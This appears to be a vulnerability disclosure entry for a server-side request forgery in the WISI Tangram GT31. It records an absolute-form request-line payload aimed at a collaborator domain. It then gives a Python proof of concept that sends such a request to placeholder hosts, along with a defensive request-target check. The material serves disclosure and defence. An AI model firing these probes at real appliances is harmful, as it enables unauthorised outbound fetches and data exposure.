| Title | Tangram wisi Control GT31 Server-Side Request Forgery |
|---|---|
| Description | It is possible to induce the application to retrieve the contents of an arbitrary external URL and return those contents in its own response. The payload http://zps398f6qv5y11m4bpcz2bo05rbizanz.oastify.com/ was submitted in the HTTP Request-Line. The application performed an HTTP request to the specified domain. The response from that request was then included in the application's own response. During the exploitation, it was identified that by replacing the request content from GET / to GET http://zps398f6qv5y11m4bpcz2bo05rbizanz.oastify.com/, DNS resolution and interaction with the collaborator occurred, indicating the possibility of a blind SSRF with out-of-band detection. |
| Source | ⚠️ http://x.x.x.x/data.xmlc?size=1 |
| User | Havook (UID 71104) |
| Submission | 12/14/2024 23:46 (1 Year ago) |
| Moderation | 12/27/2024 09:41 (12 days later) |
| Status | Accepted |
| VulDB entry | 289382 [WISI Tangram GT31 up to 20241214 HTTP Request server-side request forgery] |
| Points | 17 |
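The technique in the description is an absolute-form request-target (RFC 7230 section 5.3.2): the client sends `GET http://attacker-host/ HTTP/1.1` instead of `GET / HTTP/1.1`, and a server that treats that authority as something to fetch rather than something to serve locally becomes a forward proxy. The following is an added example, not code from the VulDB entry, the submitter or WISI: it builds the raw request by hand (ordinary HTTP libraries only emit absolute-form when talking to a proxy), checks a response for a marker served by the collaborator to distinguish the reflected case from the blind, DNS-only case, and shows the request-target handling a non-proxy server needs to avoid the flaw. The appliance address `192.0.2.10`, the collaborator host `collab.example.invalid`, the marker string and the `own_hosts` set are placeholders chosen for the example.

```python
import socket
from urllib.parse import urlsplit


def build_absolute_form_request(target_url: str, host_header: str) -> bytes:
    """Raw HTTP/1.1 request whose request-target is absolute-form
    (RFC 7230 section 5.3.2), i.e. 'GET http://example/ HTTP/1.1' rather
    than the origin-form 'GET / HTTP/1.1' that normal clients send.
    The bytes are assembled by hand and later sent verbatim over a socket."""
    return (
        f"GET {target_url} HTTP/1.1\r\n"
        f"Host: {host_header}\r\n"
        "Connection: close\r\n"
        "\r\n"
    ).encode("ascii")


def send_raw(host: str, port: int, raw: bytes, timeout: float = 10.0) -> bytes:
    """Send a hand-built request and return the full response (headers and body)."""
    with socket.create_connection((host, port), timeout=timeout) as sock:
        sock.sendall(raw)
        chunks = []
        while True:
            data = sock.recv(4096)
            if not data:
                break
            chunks.append(data)
    return b"".join(chunks)


def reflects_external_content(response: bytes, marker: bytes) -> bool:
    """Non-blind confirmation: the collaborator serves a unique marker; if it
    shows up inside the target's own response, the target fetched the URL and
    relayed the body. A DNS or HTTP hit on the collaborator with no marker in
    the response is the blind, out-of-band case the description mentions."""
    return marker in response


def classify_request_target(request_line: str, own_hosts: set) -> tuple:
    """Server-side handling that avoids the flaw. Origin servers must accept
    absolute-form targets, but a server that is not a proxy serves the path
    locally and never opens an outbound connection to the authority.
    Returns ('local', path_and_query) or ('reject', reason)."""
    parts = request_line.split()
    if len(parts) != 3:
        return ("reject", "malformed request-line")
    target = parts[1]
    if target.startswith("/"):
        return ("local", target)  # origin-form: nothing to validate
    url = urlsplit(target)
    if url.scheme.lower() not in ("http", "https") or not url.hostname:
        return ("reject", "unsupported or malformed request-target")
    if url.hostname.lower() not in {h.lower() for h in own_hosts}:
        # This is the branch a vulnerable server gets wrong: it fetches the
        # URL on the client's behalf instead of refusing to act as a proxy.
        return ("reject", f"refusing to proxy for {url.hostname}")
    path = url.path or "/"
    return ("local", path + (f"?{url.query}" if url.query else ""))


if __name__ == "__main__":
    # Constructed placeholders: not a real appliance or collaborator host.
    appliance = ("192.0.2.10", 80)
    collaborator_url = "http://collab.example.invalid/"
    marker = b"SSRF-MARKER-4f2c"
    request = build_absolute_form_request(collaborator_url, appliance[0])
    print(request.decode())
    try:
        response = send_raw(appliance[0], appliance[1], request)
        print("content relayed:", reflects_external_content(response, marker))
    except OSError as exc:
        print("no connection to placeholder target:", exc)
    print(classify_request_target(f"GET {collaborator_url} HTTP/1.1", {appliance[0]}))
```

The marker check only confirms the reflected variant; for the blind variant described in the submission, the evidence is the DNS lookup or HTTP hit recorded by the collaborator, which this script cannot observe locally. `classify_request_target` is the check a practitioner would want on the server side: it keeps only the path and query and rejects any authority that is not the server itself, so there is no outbound fetch to abuse.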